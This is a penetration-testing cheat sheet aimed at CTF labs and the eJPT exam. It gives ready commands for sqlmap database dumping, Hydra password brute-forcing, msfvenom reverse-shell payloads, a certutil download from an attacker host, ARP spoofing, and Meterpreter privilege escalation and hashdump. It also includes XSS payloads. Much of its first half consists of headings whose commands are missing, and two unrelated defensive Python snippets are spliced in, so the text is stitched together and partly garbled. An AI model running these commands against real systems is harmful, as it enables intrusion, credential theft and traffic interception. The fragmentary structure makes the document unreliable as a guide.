Running sqlmap yourself is not difficult. This tutorial will take you from noob to ninja with this powerful SQL injection testing tool. Sqlmap is a Python-based tool, which means it.
Basic workflow (angle brackets are placeholders for your own values):
- sqlmap -u <URL> --dbs // to identify database names
- sqlmap -u <URL> --tables -D <DB> // to identify table names in the given database
- sqlmap -u <URL> --columns -T <TABLE> -D <DB> // to identify column names for the given table and database combination
- sqlmap -u <URL> --dump -T <TABLE> -D <DB> // to dump the table
System Hacking
Nmap Scanning
To scan for systems and open services/ports, use Nmap.
To scan for vulnerabilities on a system.
To scan all ports with a SYN scan and OS detection.
To scan using the built-in Nmap scripts.
Netdiscover Scanning
To passively discover machines on the network, use Netdiscover.
Nikto Scanning
To scan for vulnerabilities, use Nikto.
Web Server is Open
If port 80 or 443 is open, we can look for robots.txt to check for hidden flags or clues.
To find the web server version, use the curl tool.
SMB is Open
If SMB has anonymous login misconfigured, use smbclient to list shares.
If the SMB ports are open, we can look for anonymous login to mount misconfigured shares.
If we find Administrator credentials for SMB, access the root shell using this method.
To Extract and Mount VHD Drive Files
To search for Exploits on Metasploit by Name
WordPress Open
If /wp-login.php is found in the enumeration scan, it may be a WordPress site.
To crack the login credentials for WordPress, use Hydra. We can use Burp Suite to capture the request parameters.
To scan a WordPress site for vulnerabilities.
To get a reverse shell using the admin upload.
RPC Open
If RPC is open, we can log in using rpcclient.
Powershell
To bypass the execution policy.
Web Hacking
Five Stages of Web Hacking
Enumeration and Reconnaissance Tools
- Whois, Nslookup, Dnsrecon, Google-Fu, Dig - to passively enumerate a website.
- Sublist3r - subdomain enumeration tool.
- crt.sh - certificate enumeration tool.
- Hunter.io - email enumeration tool.
- Nmap, Wappalyzer, Whatweb, Builtwith, Netcat - fingerprinting tools.
- HaveIBeenPwned - useful for breach enumeration.
- Use SecurityHeaders to find misconfigured header information on the target website.
- Use the ZAP Proxy tool to extract hidden files/directories.
- Clear Text Passwords Link
To gather information from online sources.
Scanning
Ping sweep a network.
SYN scan at timing level 4 on the 1000 most common TCP ports.
All-port scan with all scanning options, including OS, version, script and traceroute.
To scan for UDP ports (do not combine this with all the other scans, as it takes a lot of time).
Payloads
Non-staged payload example.
Staged payload example.
Shells
To use a bind shell, we have to follow two steps: 1. Create a bind shell. 2. Listen for the connection.
BufferOverflow
To generate shellcode quickly, we can use the Python pwn library.
Gobuster with Cookie (useful for directory enumeration when a cookie is needed)
SQLMAP
Redirect the HTTP request to Burp Suite, and we can see the request like this.
Now right-click and choose the copy to file option.
File Hacking
Extract Hidden Text from PDF Files
If something is hidden in a PDF which we need to find, we can press Ctrl + A to copy everything in the PDF and paste it into Notepad. If nothing is found, we can use the Inkscape tool to paste the PDF and try ungrouping several times to extract any hidden flag. Otherwise, solve it using PDF-uncompress tools like qpdf to convert the compressed data to a readable format.
Compressed File Extraction
If there is PK at the start of the file in the magic bytes, it is most probably a ZIP file.
To extract data from a recursive zip file.
Extract Hidden Strings
If a file has some hidden text, we can use the hexeditor or strings commands to locate the flag.
If the hidden text has at the end, it is base64 encoded.
To monitor the application calls of a binary.
To track all application and library calls of a program.
Cryptography
Caesar Cipher
If the word caesar appears in the question or hint, it can be a substitution cipher.
If you find ! in the cipher text, and the cipher seems to stay within a certain range of letters and appears to be a transposition of the plain text, use the Caesar Box website to brute-force the hidden message.
Vigenere Cipher
To break Vigenere ciphers without knowing the key:
- Use this website: Link - brute-force solver.
One Time Pad Cipher
To solve a One Time Pad, use OTP.
Forensics
Image File
Try the file command on the image to learn more information.
To extract data inside image files.
To check the metadata of image files.
To search for a particular string or flag in an image file.
To extract data hidden inside a password-protected image file.
Binwalk
Binwalk helps to find data inside the image or sometimes if binwalk reports as zip Archive, we can rename the file to
Extract NTFS Filesystem
To extract an NTFS file system on Linux.
Recover Files from Deleted File Systems
To recover files from deleted file systems on remote hosts.
Packet Capture
If USB keystrokes are captured in a pcap, we can use this article to extract the USB keys entered: Link
JavaScript Deobfuscator
To Deobfuscate JavaScript, use Jsnice.
Password Cracking
JOHN the ripper
If JOHN appears in the title, text or hint, it is mostly a reference to John the Ripper for brute-forcing passwords/hashes.
To crack well-known hashes, use Link
SAM Hashes
To get the system user hashes, we can follow this method.
Linux User Hashes
If we are able to extract the /etc/passwd and /etc/shadow files, we can use unshadow.
Hashcat
To crack the password, we can use hashcat; here 500 is for the $1$ format. Replace it accordingly.
Privilege Escalation
Standard Scripts for Enumeration
- Linux Priv Checker - Linux privilege enumeration checker.
- Pspy - gather information on cron jobs and processes.
- GTFOBins - if we do not exactly remember how to use a given setuid command to gain privileges.
Dirtycow
On older Linux kernels, we can gain root access using the Dirty COW exploit.
To Use DirtyCow : Link - Maybe more specifically : Dirty.c
Sudo
To check which sudo commands the current user can run without a password.
Examples:
We can try like below
Gain More Privileges on a Windows System
- In the meterpreter shell, try getsystem.
- In the meterpreter shell, try background and then follow the rest of the commands: search suggester.
- If that worked, fine; else try the rest of the commands.
- Use this link: FuzzySec Win Priv Exec
- Use this method: Sherlock
- If the current process does not own the privileges, use migrate <PID> to get more privileges in Meterpreter.
To get a shell on Windows, use Unicorn.
MySQL with Sudo Privilege
To get a shell from MySQL.
VIM Editor with Sudo Privilege
To get a shell from VIM.
Method-1:
Method-2:
Cronjob
If some system cron job fetches a URL present in a file, we can replace the URL to get the flag as below.
To monitor cron jobs, we can tail the syslogs.
More or Less Command
- If we find any file as a low-privilege user and it contains something like this, we can execute it, shrink the terminal so the pager enters visual mode, and enter !/bin/bash to get a root shell.
Improve Shell
To get a better shell after taking control of the system.
Transfer Files from Host to Target Machine
- Use python -m SimpleHTTPServer in the host folder.
- Use Apache and put the files in the /var/www/html/ folder.
- If Tomcat is open, upload the file/payload using the admin panel.
- If WordPress is running, upload the file as a plugin.
- On a Windows victim, use certutil -urlcache -f http://<HOST_IP>/<FILE_NAME> <OUTPUT_FILE_NAME>
Tools
Reconnoitre
A security tool for multithreaded information gathering and service enumeration that builds directory structures to store results and writes out recommendations for further testing.
- Link
- Total Commander - multi-purpose terminal for hacking. Link: www.ghisler.com
- CTF exploitation framework: GitHub.com/Gallopsled/pwntools (pip install pwntools)
- When using GDB, we can create a ~/.gdbinit file and add the line "set disassembly-flavor intel" to get Intel syntax.
- Dirbuster for web server enumeration attacks.
- Gobuster - used for advanced enumeration.
- 7z password cracking: use the tool 7z2john
- SSH password cracking: /usr/share/john/ssh2john.py id_rsa > output.hash
This is a cheat sheet for the eJPT exam and course.
Nmap
nmap -sn 10.10.10.0/24
nmap -sV -p- -iL targets -oN nmap.initial -v
nmap -A -p- -iL targets -oN nmap.aggressive -v
nmap -p
fping
fping -a -g 10.10.10.0/24 2>/dev/null > targets
IP Route
Syntax
ip route add <Network-range> via <router-IP> dev <interface>
eg.
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
John
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
dirb
dirb http://10.10.10.10/
dirb http://10.10.10.10/dir -u admin:admin
I suggest you use dirbuster for better speed. Keep the threads at 20. Use the /usr/share/wordlists/dirb/common.txt wordlist.
Netcat
Listening for reverse shell
nc -nvlp 1234
Banner Grabbing
nc -nv 10.10.10.10 <port>
SQLMap
Check if injection exists
sqlmap -r Post.req
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin'
Get the database if injection exists
sqlmap -r login.req --dbs
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id --dbs
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' --dbs
Get tables in a database
sqlmap -r login.req -D dbname --tables
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id -D dbname --tables
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' -D dbname --tables
Get the data in a database table
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id -D dbname -T table_name --dump
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' -D dbname -T table_name --dump
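The commands above are what the tester runs; the same workflow is easy to spot from the server side. This added example (not part of the cheat sheet) scans constructed Apache combined-format log lines for the two signs such a run leaves: sqlmap's default User-Agent and the boolean/UNION/time-based payload shapes in the query string. The log lines and the pattern set are assumptions of this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format); not captured from any real host.
SAMPLE_LOG = """\
10.10.10.5 - - [01/Jan/2024:10:00:01 +0000] "GET /file.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.10.99 - - [01/Jan/2024:10:00:02 +0000] "GET /file.php?id=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.10.10.99 - - [01/Jan/2024:10:00:03 +0000] "GET /file.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.10.10.99 - - [01/Jan/2024:10:00:04 +0000] "GET /file.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.10.7 - - [01/Jan/2024:10:00:05 +0000] "GET /login.php HTTP/1.1" 200 900 "-" "curl/8.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Heuristics for the injection shapes a sqlmap run sends: boolean, UNION and time-based probes.
SQLI_RE = re.compile(r"(?i)('\s*(and|or)\s|union\s+(all\s+)?select|\bsleep\s*\(|benchmark\s*\(|--\s*$)")

def classify(line):
    """Return the reasons a log line looks like SQL injection probing ([] if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    # Decode the query string first, since payloads arrive percent-encoded.
    query = unquote_plus(m["path"].partition("?")[2])
    if SQLI_RE.search(query):
        reasons.append("sqli pattern in query")
    return reasons

def scan_log(text):
    """Return (flagged, per_ip): flagged is [(ip, path, reasons)], per_ip counts hits per source."""
    flagged = []
    for line in text.splitlines():
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            flagged.append((m["ip"], m["path"], reasons))
    return flagged, Counter(ip for ip, _, _ in flagged)

if __name__ == "__main__":
    hits, by_ip = scan_log(SAMPLE_LOG)
    for ip, path, why in hits:
        print(ip, path, ", ".join(why))
    print("suspicious sources:", dict(by_ip))
```

Note that only the first probe carries the tool's User-Agent; a run with --random-agent is caught only by the query-string heuristics, which is why both checks are kept.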
Hydra
SSH Login Bruteforcing
hydra -v -V -u -L users.txt -P passwords.txt -t 1 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 10.10.10.10 ssh
You can use the same for FTP; just replace ssh with ftp.
HTTP POST Form
hydra -L usernames.txt -P passwords.txt -f -V 10.10.10.10 http-post-form '/login.php:user=^USER^&password=^PASS^:Incorrect credentials'
You will know which wordlists to use when the time comes.
XSS
<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>
This is a great filter bypass cheat sheet:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet
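The second payload above only exists because many filters match the literal string <script> and nothing else. This added example (not from the cheat sheet or OWASP) puts such a naive blocklist next to proper output encoding with html.escape and checks which of them still lets a script tag through; the sample inputs are constructed.

```python
import html
import re

# Constructed inputs: the two payloads from the cheat sheet plus a benign string.
SAMPLES = [
    "<script>alert(1)</script>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "Tom & Jerry <3",
]

def naive_filter(value):
    """Blocklist as often written: case-sensitive and aware of exactly one spelling of the tag."""
    return value.replace("<script>", "").replace("</script>", "")

def escape_for_html(value):
    """Output encoding: every HTML-significant character is escaped, whatever its case or spelling."""
    return html.escape(value, quote=True)

# Case-insensitive check used only to compare the two approaches.
TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)

def contains_script_tag(rendered):
    """True if a script tag (any case) survives in the text that would reach the browser."""
    return TAG_RE.search(rendered) is not None

def compare(samples=SAMPLES):
    """Return {input: (tag survives naive filter, tag survives escaping)} for each sample."""
    return {s: (contains_script_tag(naive_filter(s)),
                contains_script_tag(escape_for_html(s))) for s in samples}

if __name__ == "__main__":
    for payload, (naive_bad, escaped_bad) in compare().items():
        print(f"{payload!r}: naive filter leaks tag={naive_bad}, escaping leaks tag={escaped_bad}")
```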
msfvenom shells
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Metasploit Meterpreter autoroute
run autoroute -s 10.10.10.0/24
ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
SMB Enumeration
Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v
Access Share
smbclient //10.10.10.10/share_name
FTP Enumeration
nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v
Log in to the FTP server
ftp 10.10.10.10
Meterpreter
ps
getuid
getpid
getsystem
ps -U SYSTEM
Check UAC/privileges
run post/windows/gather/win_privs
Bypass UAC
Background the session first.
exploit/windows/local/bypassuac
set session
After PrivEsc
migrate <pid>
hashdump
Windows Command Line
To search for a file starting from the current directory
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*filename*"
Check routing table
route print
netstat -r
Check Users
net users
List drives on the machine
wmic logicaldisk get Caption,Description,providername